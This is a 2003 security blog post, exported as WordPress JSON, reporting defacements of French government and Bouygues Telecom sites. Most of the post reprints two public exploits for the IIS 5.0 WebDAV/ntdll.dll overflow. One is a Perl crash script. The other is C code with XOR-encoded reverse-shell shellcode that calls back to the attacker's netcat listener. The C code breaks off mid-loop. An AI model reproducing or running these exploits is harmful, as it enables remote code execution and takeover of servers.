{"id":45,"date":"2003-04-18T19:40:26","date_gmt":"2003-04-18T12:40:26","guid":{"rendered":""},"modified":"2003-04-18T19:40:26","modified_gmt":"2003-04-18T12:40:26","slug":"da-french-22","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2003\/04\/da-french-22\/","title":{"rendered":"da french (2\/2)"},"content":{"rendered":"

Most of them used the windows 2000 server with WebDAV. Servers are vulnerable even if the service doesn’t run.<\/p>\n

A POC (Proof Of Concept) was released several weeks ago by matrix from [url=http:\/\/www.infowarfare.dk]http:\/\/www.infowarfare.dk[\/url]<\/p>\n

code:
\n#!\/usr\/bin\/perl -w
\n # Tested on :
\n #???? W2K SP3 + the fix -> IIS issues an error
\n #???? W2K SP3 -> IIS temporarily crashes
\n #???? W2K SP2 -> IIS temporarily crashes
\n #???? W2K SP1 -> IIS does not crash, but issues a message
\n #????????about an internal error
\n #????
\n #???? W2K???? -> IIS does not crash, but issues a message about
\n #????????an internal error
\n #
\n # Microsoft Security Bulletin MS03-007
\n #
\n # DISCLAIMER:
\n # The information in this bulletin is provided “AS IS” without warranty of any kind.
\n # In no event shall we be liable for any damages whatsoever including direct, indirect,
\n # incidental, consequential, loss of business profits or special damages.
\n #
\n #??Coded by Matrix – [url=http:\/\/www.infowarfare.dk]www.infowarfare.dk[\/url]
\n #??
\n #??If you put a debugger on the Inetinfo process you can see the result,
\n #??And sorry about the code could be much more nice, but fuck, it works =)
\n #<\/p>\n

use strict;
\n use IO::Socket;
\n use LWP::Simple;<\/p>\n

# Globals Go Here.
\n my $host; # Host being probed.
\n my $port; # Webserver port.
\n my $Buffer; # A x 65535
\n my $XMLShit; # XML Request<\/p>\n

$Buffer??= “A” x 65535;
\n $Host_Header = “Host: 127.0.0.1\\r\\nContent-type: text\/xml\\r\\nContent-Length: 133\\r\\n”;
\n $XMLShit = “ \\r\\n\\r\\n\\r\\nSelect \\”DAV:displayname\\” from scope()\\r\\n<\/g:sql>\\r\\n<\/g:searchrequest>\\r\\n”;<\/p>\n

# SUBROUTINES GO HERE.
\n &intro;
\n &scan;
\n &exit; # Play safe with this .<\/p>\n

sub intro {
\n &host;<\/p>\n

sleep 3;
\n };<\/p>\n

# host subroutine.
\n sub host {
\n system(‘cls’);
\n print “\\n WebDAV OverFlow for IIS 5.0 by Matrix.”;
\n print “\\n [url=http:\/\/www.infowarfare.dk”;]http:\/\/www.infowarfare.dk”;[\/url]
\n print “\\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n”;
\n print “\\n Host : “;
\n $host=;
\n chomp $host;
\n if ($host eq “”){$host=”127.0.0.1″};
\n print “\\n Port : “;
\n $port=;
\n chomp $port;
\n if ($port =~\/\\D\/ ){$port=”80″};
\n if ($port eq “” ) {$port = “80”};
\n }; # end host subroutine.<\/p>\n

# scan subroutine.
\n sub scan {
\n print “\\n\\n”;
\n print “\\nIIS 5.0 WebDAV BufferOverflow attack – $host on port $port …”;
\n print “\\n”;
\n &connect;
\n };<\/p>\n

# Connect subroutine.
\n sub connect {
\n my $connection = IO::Socket::INET->new(Proto =>”tcp”,
\n ????????????????????????????????PeerAddr =>$host,
\n ????????????????????????????????PeerPort =>$port) || die “Could not connect to
\n $host \\n”;<\/p>\n

$connection -> autoflush(1);
\n # It is here we put it all together and Flush the Buffer
\n print $connection “SEARCH \/$Buffer HTTP\/1.1\\r\\n$Host_Header\\r\\n$XMLShit\\r\\n”;
\n close $connection;
\n };??# end connect subroutine.<\/p>\n

# exit subroutine.
\n sub exit{
\n print “\\n\\n\\n”;
\n exit;
\n };<\/p>\n

Shellcode Exploit:
\n \/*******************************************************************\/
\n \/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] *\/
\n \/* ————————————————————— *\/
\n \/* this is the exploit for ntdll.dll through WebDAV. *\/
\n \/* run a netcat ex: nc -L -vv -p 666 *\/
\n \/* wb server.com your_ip 666 0 *\/
\n \/* the shellcode is a reverse remote shell *\/
\n \/* you need to pad a bit.. the best way I think is launching *\/
\n \/* the exploit with pad = 0 and after that, the server will be *\/
\n \/* down for a couple of seconds, now retry with pad at 1 *\/
\n \/* and so on..pad 2.. pad 3.. if you haven’t the shell after *\/
\n \/* something like pad at 10 I think you better to restart from *\/
\n \/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but *\/
\n \/* on all the others servers it was at 2,3,4, etc..sometimes *\/
\n \/* you can have the force with you, and get the shell in 1 try *\/
\n \/* sometimes you need to pad more than 10 times \ud83d\ude09 *\/
\n \/* the shellcode was coded by myself, it is SEH + ScanMem to *\/
\n \/* find the famous offsets (GetProcAddress).. *\/
\n \/* I know I code like a pig, my english sucks, and my tech too *\/
\n \/* it is my first exploit..and my first shellcode..sorry \ud83d\ude1b *\/
\n \/* if you have comments feel free to mail me at: *\/
\n \/* mailto: [email]kralor@coromputer.net[\/email] *\/
\n \/* or visit us at [url=http:\/\/www.coromputer.net]www.coromputer.net[\/url] . You can speak with us *\/
\n \/* at IRC undernet channel #coromputer *\/
\n \/* ok now the greetz: *\/
\n \/* [El0d1e] to help me find some information about the bug \ud83d\ude42 *\/
\n \/* tuck_ to support me \ud83d\ude09 *\/
\n \/* and all my friends in coromputer crew! hein les poulets! =) *\/
\n \/*******************************************************************\/<\/p>\n

#include
\n #include
\n #include <\/p>\n

#pragma comment (lib,”ws2_32″) <\/p>\n

char shellc0de[] =
\n ????????”\\x55\\x8b\\xec\\x33\\xc9\\x53\\x56\\x57\\x8d\\x7d\\xa2\\xb1\\x25\\xb8\\xcc\\xcc”
\n ????????”\\xcc\\xcc\\xf3\\xab\\xeb\\x09\\xeb\\x0c\\x58\\x5b\\x59\\x5a\\x5c\\x5d\\xc3\\xe8″
\n ????????”\\xf2\\xff\\xff\\xff\\x5b\\x80\\xc3\\x10\\x33\\xc9\\x66\\xb9\\xb5\\x01\\x80\\x33″
\n ????????”\\x95\\x43\\xe2\\xfa\\x66\\x83\\xeb\\x67\\xfc\\x8b\\xcb\\x8b\\xf3\\x66\\x83\\xc6″
\n ????????”\\x46\\xad\\x56\\x40\\x74\\x16\\x55\\xe8\\x13\\x00\\x00\\x00\\x8b\\x64\\x24\\x08″
\n ????????”\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x58\\x5d\\x5e\\xeb\\xe5\\x58\\xeb\\xb9\\x64″
\n ????????”\\xff\\x35\\x00\\x00\\x00\\x00\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x48\\x66\\x81″
\n ????????”\\x38\\x4d\\x5a\\x75\\xdb\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x5d\\x5e\\x8b\\xe8″
\n ????????”\\x03\\x40\\x3c\\x8b\\x78\\x78\\x03\\xfd\\x8b\\x77\\x20\\x03\\xf5\\x33\\xd2\\x8b”
\n ????????”\\x06\\x03\\xc5\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\x25\\x81\\x78\\x04\\x72\\x6f”
\n ????????”\\x63\\x41\\x75\\x1c\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\x13\\x8b\\x47\\x24″
\n ????????”\\x03\\xc5\\x0f\\xb7\\x1c\\x50\\x8b\\x47\\x1c\\x03\\xc5\\x8b\\x1c\\x98\\x03\\xdd”
\n ????????”\\x83\\xc6\\x04\\x42\\x3b\\x57\\x18\\x75\\xc6\\x8b\\xf1\\x56\\x55\\xff\\xd3\\x83″
\n ????????”\\xc6\\x0f\\x89\\x44\\x24\\x20\\x56\\x55\\xff\\xd3\\x8b\\xec\\x81\\xec\\x94\\x00″
\n ????????”\\x00\\x00\\x83\\xc6\\x0d\\x56\\xff\\xd0\\x89\\x85\\x7c\\xff\\xff\\xff\\x89\\x9d”
\n ????????”\\x78\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x33\\xc9\\x51\\x51\\x51″
\n ????????”\\x51\\x41\\x51\\x41\\x51\\xff\\xd0\\x89\\x85\\x94\\x00\\x00\\x00\\x8b\\x85\\x7c”
\n ????????”\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x83\\xc6\\x08\\x6a\\x10\\x56″
\n ????????”\\x8b\\x8d\\x94\\x00\\x00\\x00\\x51\\xff\\xd0\\x33\\xdb\\xc7\\x45\\x8c\\x44\\x00″
\n ????????”\\x00\\x00\\x89\\x5d\\x90\\x89\\x5d\\x94\\x89\\x5d\\x98\\x89\\x5d\\x9c\\x89\\x5d”
\n ????????”\\xa0\\x89\\x5d\\xa4\\x89\\x5d\\xa8\\xc7\\x45\\xb8\\x01\\x01\\x00\\x00\\x89\\x5d”
\n ????????”\\xbc\\x89\\x5d\\xc0\\x8b\\x9d\\x94\\x00\\x00\\x00\\x89\\x5d\\xc4\\x89\\x5d\\xc8″
\n ????????”\\x89\\x5d\\xcc\\x8d\\x45\\xd0\\x50\\x8d\\x4d\\x8c\\x51\\x6a\\x00\\x6a\\x00\\x6a”
\n ????????”\\x00\\x6a\\x01\\x6a\\x00\\x6a\\x00\\x83\\xc6\\x09\\x56\\x6a\\x00\\x8b\\x45\\x20″
\n ????????”\\xff\\xd0″
\n ????????”CreateProcessA\\x00LoadLibraryA\\x00ws2_32.dll\\x00WSASocketA\\x00″
\n ????????”connect\\x00\\x02\\x00\\x02\\x9A\\xC0\\xA8\\x01\\x01\\x00″
\n ????????”cmd” \/\/ don’t change anything..
\n ????????”\\x00\\x00\\xe7\\x77″ \/\/ offsets of kernel32.dll for some win ver..
\n ????????”\\x00\\x00\\xe8\\x77″
\n ????????”\\x00\\x00\\xf0\\x77″
\n ????????”\\x00\\x00\\xe4\\x77″
\n ????????”\\x00\\x88\\x3e\\x04″ \/\/ win2k3
\n ????????”\\x00\\x00\\xf7\\xbf” \/\/ win9x =P
\n ????????”\\xff\\xff\\xff\\xff”;<\/p>\n

int test_host(char *host)
\n {
\n ??char search[100]=””;
\n ??int sock;
\n ??struct hostent *heh;
\n ??struct sockaddr_in hmm;
\n ??char buf[100] =””;<\/p>\n

??if(strlen(host)>60) {
\n ????printf(“error: victim host too long.\\r\\n”);
\n ????return 1;
\n ??}<\/p>\n

??if ((heh = gethostbyname(host))==0){
\n ????printf(“error: can’t resolve ‘%s'”,host);
\n ????return 1;
\n ??}<\/p>\n

??sprintf(search,”SEARCH \/ HTTP\/1.1\\r\\nHost: %s\\r\\n\\r\\n”,host);
\n ??hmm.sin_port = htons(80);
\n ??hmm.sin_family = AF_INET;
\n ??hmm.sin_addr = *((struct in_addr *)heh->h_addr);
\n ??
\n ??if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
\n ????printf(“error: can’t create socket”);
\n ????return 1;
\n ??}
\n ??
\n ??printf(“Checking WebDav on ‘%s’ … “,host);
\n ?
\n ??if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
\n ????printf(“CONNECTING_ERROR\\r\\n”);
\n ????return 1;
\n ??}
\n ??send(sock,search,strlen(search),0);
\n ??recv(sock,buf,sizeof(buf),0);
\n if(buf[9]==’4’&&buf[10]==’1’&&buf[11]==’1′)
\n ??return 0;
\n ??printf(“NOT FOUND\\r\\n”);
\n ??return 1;
\n }<\/p>\n

void help(char *program)
\n {
\n ??printf(“syntax: %s [padding]\\r\\n”,program);
\n ??return;
\n }<\/p>\n

void banner(void)
\n {
\n ??printf(“\\r\\n\\t [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]\\r\\n”);
\n ??printf(“\\t\\twww.coromputer.net && undernet #coromputer\\r\\n\\r\\n”);
\n ??return;
\n }<\/p>\n

void main(int argc, char *argv[])
\n {
\n ??WSADATA wsaData;
\n ??unsigned short port=0;
\n ??char *port_to_shell=””, *ip1=””, data[50]=””;
\n ??unsigned int i,j;
\n ??unsigned int ip = 0 ;
\n ??int s, PAD=0x10;
\n ??struct hostent *he;
\n ??struct sockaddr_in crpt;
\n ??char buffer[65536] =””;
\n ??char request[80000]; \/\/ huuuh, what a mess! \ud83d\ude42
\n ??char content[] =
\n ???????”\\r\\n”
\n ???????”\\r\\n”
\n ???????”\\r\\n”
\n ???????”Select \\”DAV:displayname\\” from scope()\\r\\n”
\n ???????”<\/g:sql>\\r\\n”
\n ???????”<\/g:searchrequest>\\r\\n”;<\/p>\n

??banner();
\n ??if((argc<4)||(argc>5)) {
\n ????help(argv[0]);
\n ????return;
\n ??}<\/p>\n

if(WSAStartup(0x0101,&wsaData)!=0) {
\n ??printf(“error starting winsock..”);
\n ??return;
\n ??}
\n ??
\n if(test_host(argv[1]))
\n ??return;<\/p>\n

if(argc==5)
\n ??PAD+=atoi(argv[4]);<\/p>\n

printf(“FOUND\\r\\nexploiting ntdll.dll through WebDav [ret: 0x00%02×00%02x]\\r\\n”,PAD,PAD);<\/p>\n

??ip = inet_addr(argv[2]); ip1 = (char*)&ip;<\/p>\n

shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2]; shellc0de[451]=ip1[3];<\/p>\n

??port = htons(atoi(argv[3]));
\n ??port_to_shell = (char *) &port;
\n ??shellc0de[446]=port_to_shell[0];
\n ??shellc0de[447]=port_to_shell[1];<\/p>\n

\/\/ we xor the shellcode [xored by 0x95 to avoid bad chars]
\n ?__asm {
\n ??lea eax, shellc0de
\n ??add eax, 0x34
\n xor ecx, ecx
\n mov cx, 0x1b0
\n wah:
\n xor byte ptr[eax], 0x95
\n inc eax
\n loop wah
\n }<\/p>\n

??if ((he = gethostbyname(argv[1]))==0){
\n ????printf(“error: can’t resolve ‘%s'”,argv[1]);
\n ????return;
\n ??}
\n ??
\n ??crpt.sin_port = htons(80);
\n ??crpt.sin_family = AF_INET;
\n ??crpt.sin_addr = *((struct in_addr *)he->h_addr);
\n ??
\n ??if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
\n ????printf(“error: can’t create socket”);
\n ????return;
\n ??}
\n ??
\n ??printf(“Connecting… “);
\n ?
\n ??if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
\n ????printf(“ERROR\\r\\n”);
\n ????return;
\n ??}
\n \/\/ No Operation.
\n for(i=0;i <\/p>\n

Various french Gov
\n\"image\" <\/p>\n

BouguesTelecom
\n\"image\" <\/p>\n","protected":false},"excerpt":{"rendered":"

It seems like several .gouv.fr and corporate sites were defaced during the past 48h.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-45","post","type-post","status-publish","format-standard","hentry","category-security"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-J","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/45","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=45"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/45\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=45"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=45"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=45"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}